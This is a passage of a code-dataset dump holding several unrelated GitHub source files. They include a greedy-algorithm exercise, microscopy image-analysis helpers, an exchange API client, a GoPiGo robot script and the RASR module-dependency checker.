Regression model\n logregparams = {'penalty':['l1', 'l2'], \\\n 'C':[0.001, 0.01, 0.1, 1, 10, 100, 1000], \\\n 'tol': [0.01, 0.001, 0.0001, 0.0001, 0.00001]}\n\n # Boolean value to execute Grid Search on XGBoost model\n xgbsearch = False\n\n # Grid Search parameters for XGBoost model\n xgbparams = {'learning_rate':[.001, .01, .1, .2, .5], \\\n 'max_depth':[3, 5, 10, 50, 100], \\\n 'min_child_weight': [2, 5, 10, 50, 100]}\n\n # Boolean value to print all scores from Grid Search\n allscores = False\n\n@xp.automain\ndef run_experiment():\n return conduct_grid_search()","repo_name":"Lab41/pythia","sub_path":"experiments/conduct_grid_search.py","file_name":"conduct_grid_search.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"54"} +{"seq_id":"73077420640","text":"import sys\n\nsys.stdin = open('3-4input.txt')\n\nn, m = map(int, input().split())\n\ncnt =0\nwhile True:\n # n이 m으로 나누어 떨어질 때까지 n에서 1씩 빼기\n target = (n//m) * m\n cnt += (n-target)\n\n n = target\n #print(target)\n # n이 m 보다 작을 때 (더 이상 나눌 수 없을 때 반복문 탈출)\n if n < m:\n break\n cnt +=1\n n //= m\n #print(n)\n\ncnt += (n-1)\nprint(cnt)","repo_name":"cmkds/algo","sub_path":"이코테/파트2/ch3 그리디/3-4 1이 될 때까지 답안 예시.py","file_name":"3-4 1이 될 때까지 답안 예시.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21071632257","text":"import numpy as np\nimport hyperspy.api as hs\n\nfrom skimage.transform import hough_line, hough_line_peaks, probabilistic_hough_line\nfrom skimage.feature import canny\nimport matplotlib.pyplot as plt\n\n\ndef Find_number(string):\n '''Pulls the number out from between xmp flags.'''\n start = string.find('>') + 1\n finish = string.find('</')\n return string[start:finish] \n\ndef Split_add_scale(all_tifs, files):\n '''Split the HAADF and EBIC images into different stacks. Corrects the spatial scale. The images need to be in a hyperspy stack.'''\n if np.shape(np.shape(all_tifs))[0] == 3:\n \"for only one type of image\"\n for i in range(0,2):\n all_tifs.axes_manager[i].scale = Pull_Meta_dictionary(files[0])['Scale']*1e09 #convert to nm\n all_tifs.axes_manager[i].units = 'nm'\n\n HAADFs = all_tifs.split(axis=0)\n return HAADFs\n\t\t\n elif np.shape(np.shape(all_tifs))[0] == 4: \n\n for i in range(2,4):\n all_tifs.axes_manager[i].scale = Pull_Meta_dictionary(files[0])['Scale']*1e09 #convert to nm\n all_tifs.axes_manager[i].units = 'nm'\n\n HAADFs, EBIC_raw = all_tifs.split(axis=0)\n return HAADFs, EBIC_raw\n\n\ndef Pull_Meta_dictionary(file):\n '''Searches a tif file for the array of search words. Compiles a dictionary from these. The HAADF values are\n written first, then the EBIC values overwrite these.'''\n \n \n search_words = np.array(['Mag>', 'PixelSizeX>', '<ebic:Ooffset', '<ebic:Contr', '<ebic:InvIoffset',\n '<ebic:PreampGain', '<cdev:HV', '<ebic:BeamCurrent', 'diAdj:A1Gain>',\n '<diImg:VideoInCalibration'])\n\n Meta_dictionary = {}\n\n flag = 0\n\n for word in search_words:\n with open(file, 'r', encoding='utf-8', errors='ignore') as fd:\n for line in fd:\n if flag == 1:\n #print(word)\n Meta_dictionary.update({word : Find_number(line)})\n flag = 0\n\n elif flag == 3:\n Meta_dictionary.update({'Video_Offset' : Find_number(line)})\n flag = 0\n\n elif flag == 2:\n #print(word)\n Meta_dictionary.update({word : Find_number(line)})\n flag = 3\n\n\n\n\n elif word in line:\n if word in ['Mag>', 'PixelSizeX>', '<ebic:InvIoffset', 'diAdj:A1Gain>']:\n Meta_dictionary.update({word : Find_number(line)})\n elif word in ['<ebic:Contr', '<ebic:Ooffset', '<ebic:PreampGain', '<cdev:HV',\n '<ebic:BeamCurrent']:\n flag = 1\n\n elif word in ['<diImg:VideoInCalibration']:\n flag = 2\n \n Clean_meta_dictionary = {'Mag' : int(Meta_dictionary['Mag>']),\n 'Scale' : np.float(Meta_dictionary['PixelSizeX>']),\n 'InvIoffset' : np.float(Meta_dictionary['<ebic:InvIoffset']),\n 'Ooffset' : np.float(Meta_dictionary['<ebic:Ooffset']),\n 'Contrast' : np.float(Meta_dictionary['<ebic:Contr']),\n 'PreampGain' : np.float(Meta_dictionary['<ebic:PreampGain']),\n 'HV': np.float(Meta_dictionary['<cdev:HV']),\n 'BeamCurrent' : np.float(Meta_dictionary['<ebic:BeamCurrent']),\n 'A1Gain': np.float(Meta_dictionary['diAdj:A1Gain>']),\n 'Video_gain' : np.float(Meta_dictionary['<diImg:VideoInCalibration']),\n 'Video_offset' : np.float(Meta_dictionary['Video_Offset'])}\n return Clean_meta_dictionary\n\ndef greyscale_to_videoV(value, Metadata_dict):\n 'V = ADC-Value / Gain – Offset'\n return (value / Metadata_dict['Video_gain']) - Metadata_dict['Video_offset']\n\ndef diffV_to_current(value, Metadata_dict):\n return (((value - Metadata_dict['Ooffset']-(0.5-0.5000))/Metadata_dict['Contrast'])\n - Metadata_dict['InvIoffset'])/np.power(10, Metadata_dict['PreampGain']) * 1e9 * 1.0047\n\ndef greyscale_to_current(value, Metadata_dict):\n\t'''Converts any greyscale value to an ebic current. Uses amp settings in Metadata_dict.'''\n\treturn diffV_to_current(greyscale_to_videoV(value, Metadata_dict), Metadata_dict)\n\ndef Efficiency(greyval, Metadata_dict):\n A = ((greyval - Metadata_dict['Ooffset'])/Metadata_dict['Contrast']) - Metadata_dict['InvIoffset']\n \n B = Metadata_dict['HV'] * 250 * (Metadata_dict['BeamCurrent']/1000)\n return np.abs((A/np.power(Metadata_dict['PreampGain'], 10)) * 1e09 * 1.0047) / B\n\n\n\ndef Plot_return_Hough_transform(im, threshold=480):\n '''Plots the hough transform for the image and returns the hough peaks.'''\n image = im.data > threshold\n\n h, theta, d = hough_line(image)\n\n fig, axes = plt.subplots(1, 3, figsize=(15,6))\n\n ax = axes.ravel()\n\n ax[0].imshow(im.data)\n ax[0].set_axis_off()\n\n ax[1].imshow(np.log(1 + h),\n extent=[np.rad2deg(theta[-1]), np.rad2deg(theta[0]), d[-1], d[0]],\n aspect=1/5)\n ax[1].set_title('Hough transform')\n ax[1].set_xlabel('Angles (degrees)')\n ax[1].set_ylabel('Distance (pixels)')\n #ax[1].axis('image')\n\n ax[2].imshow(image)\n for _, angle, dist in zip(*hough_line_peaks(h, theta, d)):\n y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)\n y1 = (dist - image.shape[1] * np.cos(angle)) / np.sin(angle)\n ax[2].plot((0, image.shape[1]), (y0, y1), '-r')\n ax[2].set_xlim((0, image.shape[1]))\n ax[2].set_ylim((image.shape[0], 0))\n ax[2].set_axis_off()\n\n accum, angles, dists = hough_line_peaks(h, theta, d)\n\n plt.savefig('Hough_transform_output.png', dpi=200)\n \n return accum, angles, dists\n\ndef Fit_ebic_profile(series, scale, ):\n '''Fits an ebic profile using offset, error function, and a lorenztian.'''\n \n s = hs.signals.Signal1D(series)\n s.axes_manager[0].scale = scale\n s.axes_manager[0].units = 'nm'\n \n m = s.create_model()\n\n s.axes_manager[0].offset = -np.argmax(s.data)* scale\n\n lorentzian = hs.model.components1D.Lorentzian() # Create a Lorentzian comp.\n offset = hs.model.components1D.Offset()\n erf = hs.model.components1D.Erf()\n\n\n lorentzian.A.value = 4000000\n lorentzian.gamma.value = 30 * scale\n\n offset.offset.value = np.min(series)\n\n erf.A.value = -9000\n erf.sigma.value = 50 * scale\n erf.origin.value = 1\n\n m.append(lorentzian) # Add it to the model\n m.append(offset)\n m.append(erf)\n \n m.fit()\n return m\n","repo_name":"aconlan/EBIC","sub_path":"ebic.py","file_name":"ebic.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13624585146","text":"# Mi primera libería\n\ndef cplxsum(a, b):\n real = a[0] + b[0]\n imag = a[1] + b[1]\n return (real, imag)\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print(cplxsum((3,5),(-2.4,6.8))) # (3 + 5i)+(-2.4 + 6.8i) = (0.6 + 11.8i)\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"dnielben/libcomplejos","sub_path":"libcomplex.py","file_name":"libcomplex.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14838520151","text":"from infrastructure.built_in.adapter.request import post_data, open_url\nfrom private.details import (\n get_app_key,\n get_cert,\n get_exchange_url,\n get_account_url,\n get_login_url,\n get_user_details,\n get_account_str,\n)\n\n\nclass ExternalAPIHandler:\n def __init__(self, environment=\"Prod\"):\n self.environment = environment\n self._app_key = None\n self._token = None\n self._headers = None\n\n def get_headers(self):\n return self._headers\n\n def get_account_status(self):\n\n account_status = self._call_account()\n\n return account_status\n\n def set_headers(self):\n self._app_key = get_app_key(environment=self.environment)\n data = self._login()\n self._token = self._get_token(data=data)\n if self._has_token():\n self._headers = self._make_headers()\n return 1\n\n return 0\n\n def _call_account(self):\n response = self._call_api(\n url=get_account_url(),\n request='{\"jsonrpc\": \"2.0\", \"method\": \"%s\"}' % get_account_str(),\n )\n account_status = self._try_get_data(data=response)\n return account_status\n\n def _call_exchange(self, request):\n response = self._call_api(url=get_exchange_url(), request=request)\n data = self._try_get_data(data=response, name=\"result\")\n return data\n\n def _post_instructions(self, request):\n response = self._call_api(url=get_exchange_url(), request=request)\n data = self._try_get_data(data=response, name=\"instructionReports\") or []\n return data\n\n def _call_api(self, url, request):\n response = open_url(url=url, request=request, headers=self.get_headers())\n return response\n\n def _try_get_data(self, data, name=\"result\"):\n try:\n result = data.get(name)\n except:\n result = None\n return result\n\n def _login(self):\n response = post_data(\n url=get_login_url(),\n data=get_user_details(),\n cert=get_cert(),\n headers={\n \"X-Application\": self._app_key,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n },\n )\n return response\n\n def _get_token(self, data):\n return data.get(\"sessionToken\")\n\n def _has_token(self):\n return self._token is not None\n\n def _make_headers(self):\n return {\n \"X-Application\": self._app_key,\n \"X-Authentication\": self._token,\n \"content-type\": \"application/json\",\n }\n","repo_name":"mattseddon/billy_cart","sub_path":"infrastructure/external_api/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4496535388","text":"from easygopigo import *\nfrom gopigo import *\nfrom time import sleep\nimport atexit\n\n@atexit.register\n# this will be called if the program is killed via \n# a Ctrl-C on the keyboard or any other reason\ndef cleanup():\n\tstop()\n\t\n\t\n# Let's start the GoPiGo. \n# this command only needs to be given once \n# GoPiGo will keep going forward until told to stop\nprint(\"Going forward\")\nforward()\n\n# let's name our ultrasonic sensor\nmy_ultrasonic = UltraSonicSensor(\"A1\")\n\n# Note the absence of Wait code, or time.sleep in Python\n# As GoPiGo is not using broadcast events in Python\n# there's no need to space the queries out\n# It's possible to loop as quickly as possible\n# and get precise behavior.\nprint(\"To stop the forever loop, use Ctrl-C on the keyboard\")\nwhile True:\n\tdist = my_ultrasonic.read()\n\n\t# in case of error the above function can return a value of -1\n\t# there's a danger here if we simply check for less than 40 cm\n\tif dist > 0 and dist < 40:\n\t\tprint(\"Object too close. Stopping!\")\n\t\tstop()\n\t\tbreak # this break forces the while loop to quit\n\n","repo_name":"DexterInd/GoBox","sub_path":"Mission_12_Materials/m05_stopForObstacle.py","file_name":"m05_stopForObstacle.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37188952869","text":"#! /usr/bin/env python3\n\"\"\" Tool for handling of Sprint modules \"\"\"\n\n__version__ = \"$Id$\"\n__author__ = \"rybach@i6.informatik.rwth-aachen.de\"\n\nimport sys, os, copy\nimport optparse\nimport pickle\nimport re\nfrom modules import parseModulesMake\nDEBUG = False\n\nIGNORE_DIRS = [\"Tools\", \"Translation\", \".svn\", \".build\", \"doc\",\n \"development\", \"Flac\", \"Test\" ]\nIGNORE_FILES = [ \"check.cc\", \"check-xml.cc\" ]\nIGNORE_DEP = [ (\"Audio\", \"Wav\") ]\nDIR_MODULES = { \"Nn\": \"MODULE_NN\",\n \"Flf\": \"MODULE_FLF\",\n \"Flf/FlfCore\": \"MODULE_FLF_CORE\",\n \"Flf/FlfExt\": \"MODULE_FLF_EXT\",\n \"Math/Nr\": \"MODULE_MATH_NR\",\n \"Search/Wfst\": \"MODULE_SEARCH_WFST\",\n \"Search/AdvancedTreeSearch\": \"MODULE_ADVANCED_TREE_SEARCH\",\n \"OpenFst\": \"MODULE_OPENFST\",\n \"Test\": \"MODULE_TEST\"\n }\n\"\"\" modules without actual files, used to enable/disable\ncertain functionality \"\"\"\nPSEUDO_MODULES = [ \"MODULE_TBB\",\n \"MODULE_OPENMP\",\n \"MODULE_INTEL_MKL\",\n \"MODULE_ACML\",\n \"MODULE_CUDA\"\n ]\n\n\"\"\" mapping from special include files to required modules \"\"\"\nDEFAULT_DEPS = { '<omp.h>' : \"MODULE_OPENMP\",\n '<acml.h>' : \"MODULE_ACML\",\n '\"mkl.h\"' : \"MODULE_INTEL_MKL\",\n '<cublas_v2.h>' : \"MODULE_CUDA\",\n '<cuda_runtime.h>' : \"MODULE_CUDA\",\n '<tbb/parallel_for.h>' : \"MODULE_TBB\"\n }\n\nINCLUDE_EXT = [ \".hh\", \".cc\", \".h\", \".tcc\", \".c\" ]\n\ndef debug(msg):\n if DEBUG:\n sys.stderr.write(\"DEBUG: %s\\n\" % str(msg))\n\n\ndef findFiles():\n \"\"\"find all relevant source files\"\"\"\n fileList = []\n makefiles = []\n # ignore files with 2 or more dots in the filename\n ignoreRe = re.compile(\"([^/]+\\.[^/]*\\.[^/]+)$\")\n for root, dirs, files in os.walk(\"src\"):\n debug(\"root=%s dirs=%s\" % (str(root), str(dirs)))\n for dir in IGNORE_DIRS:\n if dir in dirs:\n dirs.remove(dir)\n debug(\"ignore %s\" % dir)\n if root != \"src\" and root[-3:] != \"doc\":\n for f in files:\n ext = f[f.rfind(\".\"):]\n pathName = root[4:]\n if ext in INCLUDE_EXT and not f in IGNORE_FILES and \\\n not ignoreRe.match(f):\n id = len(fileList)\n fileList.append( (pathName, f) )\n elif (f == \"Makefile\"):\n debug(\"found makefile: %s %s\" % (pathName, f))\n makefiles.append( (pathName, f) )\n return fileList, makefiles\n\n\ndef getEntities(files):\n \"\"\"create entity ids for a list of filenames\"\"\"\n entitities = []\n entityDict = {}\n for p, f in files:\n name = f[:f.rfind(\".\")]\n entity = (p, name)\n if not entity in entityDict:\n entityDict[entity] = len(entitities)\n entitities.append(entity)\n for m in PSEUDO_MODULES:\n entity = (\"#\", m)\n if not entity in entityDict:\n entityDict[entity] = len(entitities)\n entitities.append(entity)\n return entitities, entityDict\n\n\nclass Modules:\n \"\"\"handles module to file relationships.\n parses all makefiles to get the module\n membership information\n \"\"\"\n def __init__(self, entityDict):\n self.entityDict = entityDict\n self.moduleFiles = []\n self.moduleNames = []\n self.moduleId = {}\n self.entityToModules = []\n self.autoNames = set()\n\n def parseMakefiles(self, makefiles):\n \"\"\"read all makefiles and create the set of entities\n for each discovered module\n \"\"\"\n for p, n in makefiles:\n filename = os.path.join(\"src\", p, n)\n self._parseFile(p, filename)\n\n def addDefaultModules(self, entities):\n \"\"\"add entities, which are not part of a pre-defined\n module to a default module MODULE_<DIRNAME>\n \"\"\"\n self._setupEntityToModules()\n for e in range(len(self.entityDict)):\n path, name = entities[e]\n if self.entityToModules[e] is None:\n isDefaultName = False\n if path in DIR_MODULES:\n moduleName = DIR_MODULES[path]\n elif path == \"#\":\n moduleName = name\n else:\n moduleName = \"MODULE_\" + path.upper().replace(\"/\", \"_\")\n isDefaultName = True\n m = self._addToModule(moduleName, e)\n self.entityToModules[e] = m\n if isDefaultName: self.autoNames.add(m)\n debug(\"default: %d -> %s, %d\" % (e, self.moduleNames[m], isDefaultName))\n for m in DIR_MODULES.values():\n self._addModule(m)\n\n def _setupEntityToModules(self):\n for e in range(len(self.entityDict)):\n self.entityToModules.append(None)\n ignore = [ self.entityDict[e] for e in IGNORE_DEP ]\n for m in range(len(self.moduleFiles)):\n for e in self.moduleFiles[m]:\n if e in ignore: continue\n if not self.entityToModules[e]:\n self.entityToModules[e] = m\n debug(\"e2m: %d -> %s\" % (e, self.moduleNames[m]))\n else:\n if self.entityToModules[e] != m:\n raise Exception(\"%s != %s\" % (self.moduleNames[m],\n self.moduleNames[self.entityToModules[e]]))\n\n def _parseFile(self, dir, filename):\n debug(\"parsing %s\" % filename)\n l = 0\n curMod = []\n for line in open(filename, \"rt\"):\n l += 1\n line = line.strip()\n if not line: continue\n aline = line.split()\n if aline[0] == \"ifdef\":\n if curMod:\n sys.stderr.write(\"ambigous definition in %s:%d\\n\" % (filename, l))\n sys.stderr.write(\"curMod=%s\\n\" % \" \".join(curMod))\n sys.stderr.write(line + \"\\n\")\n curMod.append(aline[1])\n elif aline[0] == \"endif\":\n if curMod: curMod.pop()\n else:\n if curMod:\n try:\n e = self._getEntity(aline, dir)\n except KeyError as e:\n sys.stderr.write(\"Warning: unknown file in line '%s' (%s:%d)\\n\" %\n (line, filename, l))\n e = -1\n if e >= 0:\n assignedModule = self._addToModule(curMod[0], e)\n debug(\"%d -> %s\" % (e, self.moduleNames[assignedModule]))\n else:\n debug(\"unknown entity in %s: %s\" % (filename, str(aline)))\n\n def _getEntity(self, line, dir):\n curFile = \"\"\n curDir = dir\n if len(line) > 1 and line[1] == '+=':\n target = line[0].split(\"_\")\n if target[-1] == \"O\" and target[0] != \"CHECK\" and \\\n not \"libSprint\" in line[2]:\n curFile = \"/\".join(line[2].split(\"/\")[1:])\n elif line[0] == \"#MODF\":\n curFile = line[1]\n result = -1\n if curFile:\n entity = (curDir, curFile.split(\".\")[0])\n debug(str(entity))\n result = self.entityDict[entity]\n return result\n\n def _addModule(self, module):\n if not module in self.moduleId:\n id = len(self.moduleId)\n self.moduleId[module] = id\n self.moduleNames.append(module)\n self.moduleFiles.append([])\n else:\n id = self.moduleId[module]\n return id\n\n def _addToModule(self, module, entity):\n id = self._addModule(module)\n self.moduleFiles[id].append(entity)\n return id\n\n def toStrings(self, modules):\n \"\"\"list of module ids to list of module names\"\"\"\n r = [ self.moduleNames[m] for m in modules ]\n r.sort()\n return r\n\n def toString(self, module):\n \"\"\"module id to module name\"\"\"\n return self.moduleNames[module]\n\n\n\nclass Dependencies:\n \"\"\"handles file dependencies.\n parses all source files to check for included\n header files.\n \"\"\"\n def __init__(self, modules, entities):\n self.modules = modules\n self.entities = entities\n self.dependencies = {}\n self.connections = {}\n self.fileDependencies = {}\n for m in range(len(modules.moduleNames)):\n self.dependencies[m] = [set(), set()]\n\n def parseFiles(self, entityDict):\n \"\"\"parse all source files for all entities in entityDict\"\"\"\n for name, id in entityDict.items():\n filename = \"src/%s/%s\" % name\n includes = []\n for ext in INCLUDE_EXT:\n if os.path.isfile(filename + ext):\n includes += self._parseFile(filename + ext)\n entities = self._getEntities(entityDict, name, includes)\n self._addDependencies(id, entities)\n\n def getFileDependencies(self, e):\n \"\"\"returns direct and indirect module dependencies of the given entity.\"\"\"\n deps = set()\n for m in self.fileDependencies[e]:\n deps.add(m)\n deps.update(self.dependencies[m][0])\n return self.fileDependencies[e], deps.difference(self.modules.autoNames)\n\n def _addDependencies(self, e, includes):\n module = self.modules.entityToModules[e]\n debug(\"module: %d %s\" % (module, self.modules.moduleNames[module]))\n for i, cond in includes:\n c = int(cond)\n depModule = self.modules.entityToModules[i]\n debug(\"depends: %d %s cond=%d\" % (depModule, self.modules.moduleNames[depModule], c))\n self.dependencies[module][c].add(depModule)\n if not e in self.fileDependencies:\n self.fileDependencies[e] = set()\n self.fileDependencies[e].add(depModule)\n self._addConnection(module, depModule, e, None)\n\n def _addConnection(self, modFrom, modTo, entity, module):\n if not modFrom in self.connections:\n self.connections[modFrom] = {modFrom: []}\n if not modTo in self.connections[modFrom]:\n self.connections[modFrom][modTo] = []\n self.connections[modFrom][modTo].append((entity, module))\n\n def getConnection(self, modFrom, modTo):\n \"\"\"returns the entities that cause the dependency\n between the two given modules.\"\"\"\n try:\n item = self.connections[modFrom][modTo]\n except KeyError:\n return None\n ret = []\n for i in item:\n if i[0] is None:\n ret.append(self.modules.moduleNames[i[1]])\n else:\n ret.append(self.entities[i[0]])\n return ret\n\n def _stripExt(self, f):\n return re.sub(\"\\.hh?$\", \"\", f)\n\n def _getEntities(self, entityDict, file, includes):\n eIncludes = []\n for name, con in includes:\n n = None\n debug(\"name: \" + name)\n if name in DEFAULT_DEPS:\n n = (\"#\", DEFAULT_DEPS[name])\n elif name[0] == '\"':\n a = (file[0] + \"/\" + name[1:-1]).split(\"/\")\n n = (\"/\".join(a[:-1]), self._stripExt(a[-1]))\n elif name.find(\"/\"):\n a = name[1:-1].split(\"/\")\n n = (\"/\".join(a[:-1]), self._stripExt(a[-1]))\n else:\n debug(\"ignored include: \" + name)\n if n:\n debug(\"n: \" + str(n))\n # remove .hh/.h\n n[1] .replace(\".hh\", \"\").replace(\".h\", \"\")\n if n in entityDict:\n debug(\"%s %d con=%d\" % (str(n), entityDict[n], con))\n eIncludes.append((entityDict[n], con))\n else:\n debug(\"unknown include: \" + str(n))\n return eIncludes\n\n def _parseFile(self, filename):\n includes = []\n condStack = [ False ]\n debug(\"parsing \" + filename)\n for line in open(filename, \"rt\", encoding=\"utf-8\"):\n line = line.strip()\n if not line or line[0] != '#': continue\n sline = line.split()\n if sline[0][:3] == \"#if\":\n pos = line.find(\"MODULE_\")\n if pos >= 0 and line[pos-1:pos+9] != \"_MODULE_HH\":\n condStack.append(True)\n else:\n condStack.append(condStack[-1])\n elif sline[0] == \"#endif\":\n condStack.pop()\n elif sline[0] == \"#include\":\n includes.append((sline[1], condStack[-1]))\n return includes\n\n def buildClosure(self):\n \"\"\"build the dependency closure for all known modules.\n resolves the indirect dependencies of all modules.\n updates self.dependencies.\n \"\"\"\n self.finished = [ False ] * len(self.dependencies)\n for m in self.dependencies.keys():\n trace = [m]\n deps = self._close(trace, m)\n assert(self.dependencies[m][0] == deps)\n del self.finished\n\n def _close(self, trace, module):\n if self.finished[module]:\n return self.dependencies[module][0]\n deps = copy.copy(self.dependencies[module][0])\n for m in self.dependencies[module][0]:\n if not m in trace:\n c = self._close(trace + [m], m)\n deps.update(c)\n for conn in c:\n self._addConnection(module, conn, None, m)\n self.dependencies[module][0] = deps\n self.finished[module] = True\n return deps\n\n def removeDefaultModules(self):\n \"\"\"removes the automatically generated modules from the\n dependency sets.\n \"\"\"\n for m in self.dependencies:\n self.dependencies[m][0] = self.dependencies[m][0].difference(self.modules.autoNames)\n if m in self.dependencies[m][0]: self.dependencies[m][0].remove(m)\n\n def factorized(self, module, cond):\n \"\"\"returns the factorized set of module dependencies for\n the given module.\n removes module dependencies if they are implied by another\n dependent module.\n \"\"\"\n newdeps = set()\n todo = copy.copy(self.dependencies[module][cond])\n while todo:\n best = -1\n bestm = -1\n for m in todo:\n if m == module: continue\n intersection = len(todo.intersection(self.dependencies[m][cond]))\n if intersection > best:\n best = intersection\n bestm = m\n assert(bestm != -1)\n newdeps.add(bestm)\n todo.difference_update(self.dependencies[bestm][cond])\n if best == 0:\n newdeps.update(todo)\n break\n return newdeps\n\n\ndef checkDependencies(db, enabled, disabled):\n \"\"\"check if all dependencies are met in the given\n set of enabled modules.\n \"\"\"\n enabledModules = set()\n for m in enabled:\n try:\n enabledModules.add(db.getModuleId(m))\n except KeyError:\n print(\"Warning: Unknown module \\\"%s\\\"\" % m)\n retval = 0\n for mid in enabledModules:\n debug(\"module %s %d\" % (db.getModuleName(mid), mid))\n depModules = db.deps.dependencies[mid][0]\n if not depModules.issubset(enabledModules):\n print(\"unmet dependencies for module \", db.getModuleName(mid))\n for d in depModules:\n if not d in enabledModules:\n print(\" %s requires %s\" % (db.getModuleName(mid), db.getModuleName(d)))\n retval = 1\n return retval\n\n\nclass Database:\n \"\"\"creates, loads, stores the Modules and the\n Dependencies object.\n \"\"\"\n def __init__(self):\n self.modules = None\n self.entities = None\n self.entityDict = None\n self.deps = None\n\n def write(self, filename):\n fp = file(filename, \"wb\")\n pickle.dump(self, fp, 2)\n\n def load(self, filename):\n try:\n fp = file(filename, \"rb\")\n tmp = pickle.load(fp)\n except Exception as e:\n sys.stderr.write(\"db load error: %s\\n\", str(e))\n return False\n self.modules = tmp.modules\n self.entities = tmp.entities\n self.entityDict = tmp.entityDict\n self.deps = tmp.deps\n return True\n\n def create(self, files, makefiles):\n self.entities, self.entityDict = getEntities(files)\n self.modules = Modules(self.entityDict)\n self.modules.parseMakefiles(makefiles)\n self.modules.addDefaultModules(self.entities)\n self.deps = Dependencies(self.modules, self.entities)\n self.deps.parseFiles(self.entityDict)\n self.deps.buildClosure()\n self.deps.removeDefaultModules()\n\n def getFileId(self, filename):\n a = filename.replace(\"src/\", \"\").split(\"/\")\n n = (\"/\".join(a[:-1]), a[-1][:-3])\n return self.entityDict[n]\n\n def getEntity(self, fileid):\n return self.entities[fileid]\n\n def getEntities(self, fileids):\n return [ self.entities[id] for id in fileids ]\n\n def getModuleId(self, module):\n return self.modules.moduleId[module]\n\n def getModuleName(self, moduleId):\n return self.modules.moduleNames[moduleId]\n\n\ndef main(options, args):\n db = Database()\n if options.load:\n sys.stderr.write(\"loading database %s\\n\" % options.database)\n ok = db.load(options.database)\n if not ok:\n return 1\n else:\n os.chdir(options.basedir)\n files, makefiles = findFiles()\n sys.stderr.write(\"%d files, %d makefiles\\n\" % (len(files), len(makefiles)))\n db.create(files, makefiles)\n if options.write:\n sys.stderr.write(\"storing database %s\\n\" % options.database)\n db.write(options.database)\n\n if options.show:\n mids = db.deps.dependencies.keys()\n mids.sort(key = lambda i: db.modules.toString(i))\n for m in mids:\n d = db.deps.dependencies[m]\n if not (d[0] or d[1]): continue\n print(db.modules.toString(m))\n if options.factorize:\n moduleDep = db.deps.factorized(m, 0)\n condModuleDep = db.deps.factorized(m, 1)\n else:\n moduleDep = d[0]\n condModuleDep = d[1]\n print(\"depends on:\", db.modules.toStrings(moduleDep))\n print(\"cond. depends on:\", db.modules.toStrings(condModuleDep))\n print(\"\")\n if options.depfile:\n id = db.getFileId(options.depfile)\n direct, indirect = db.deps.getFileDependencies(id)\n print(id, db.getEntity(id))\n print(\"direct: \", db.modules.toStrings(direct))\n print(\"indirect: \", db.modules.toStrings(indirect))\n if options.connection:\n m1, m2 = options.connection.split(\",\")\n m1 = db.getModuleId(m1)\n m2 = db.getModuleId(m2)\n print(db.getModuleName(m1), \"->\", db.getModuleName(m2))\n print(db.deps.getConnection(m1, m2))\n if options.moduledep:\n mid = db.getModuleId(options.moduledep)\n print(mid, db.getModuleName(mid))\n if options.factorize:\n moduleDep = db.deps.factorized(mid, 0)\n condModuleDep = db.deps.factorized(mid, 1)\n else:\n moduleDep, condModuleDep = db.deps.dependencies[mid]\n print(\"depends on: \", db.modules.toStrings(moduleDep))\n print(\"cond. depends on: \", db.modules.toStrings(condModuleDep))\n if options.files:\n mid = db.getModuleId(options.files)\n print(mid, db.getModuleName(mid))\n print(db.getEntities( db.modules.moduleFiles[mid] ))\n if options.check:\n disabled, enabled = parseModulesMake(options.modulesMake)\n return checkDependencies(db, enabled, disabled)\n return 0\n\n\nif __name__ == \"__main__\":\n optparser = optparse.OptionParser(usage = \"%prog [OPTIONS]\")\n optparser.add_option(\"-k\", \"--modules-file\", help=\"Modules.make\", default=\"Modules.make\",\n dest=\"modulesMake\")\n optparser.add_option(\"-a\", \"--database\", help=\"database file\", default=\"deps.db\",\n dest=\"database\")\n optparser.add_option(\"-l\", \"--load\", help=\"load database\", default=False, action=\"store_true\",\n dest=\"load\")\n optparser.add_option(\"-w\", \"--write\", help=\"store database\", default=False, action=\"store_true\",\n dest=\"write\")\n optparser.add_option(\"-s\", \"--show\", help=\"show all dependencies\", default=False, action=\"store_true\",\n dest=\"show\")\n optparser.add_option(\"-d\", \"--dependencies\", help=\"dependencies of a file\", default=None,\n dest=\"depfile\")\n optparser.add_option(\"-c\", \"--connection\", help=\"dependencies between 2 modules\", default=None,\n dest=\"connection\")\n optparser.add_option(\"-m\", \"--module\", help=\"module dependencies\", default=None,\n dest=\"moduledep\")\n optparser.add_option(\"-t\", \"--factorize\", help=\"factorize dependencies\", default=False, action=\"store_true\",\n dest=\"factorize\")\n optparser.add_option(\"-f\", \"--files\", help=\"show files of a module\", default=None,\n dest=\"files\")\n optparser.add_option(\"-e\", \"--check\", help=\"check if module dependencies are fulfilled \"\n \"with the modules enabled in Modules.make\",\n action=\"store_true\", default=False, dest=\"check\")\n optparser.add_option(\"-b\", \"--basedir\", help=\"package root directory\",\n default=\".\", dest=\"basedir\")\n\n options, args = optparser.parse_args()\n r = main(options, args)\n sys.exit(r)\n\n","repo_name":"rwth-i6/rasr","sub_path":"scripts/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":21997,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"54"} +{"seq_id":"40686587710","text":"\"\"\"users routes\"\"\"\nfrom flask import current_app as app, jsonify, request\nfrom models import Trial, BaseObject, db\nfrom collections import OrderedDict\nimport numpy as np\nimport json\nimport glob\n\n\n@app.route('/trial/<user_id>/<trial_no>', methods=['GET'])\n\ndef get_trial(user_id,trial_no):\n\n query = Trial.query.filter(Trial.UserNo==user_id, Trial.TrialNo==trial_no)\n if query != None:\n print('Exists')\n \n block = 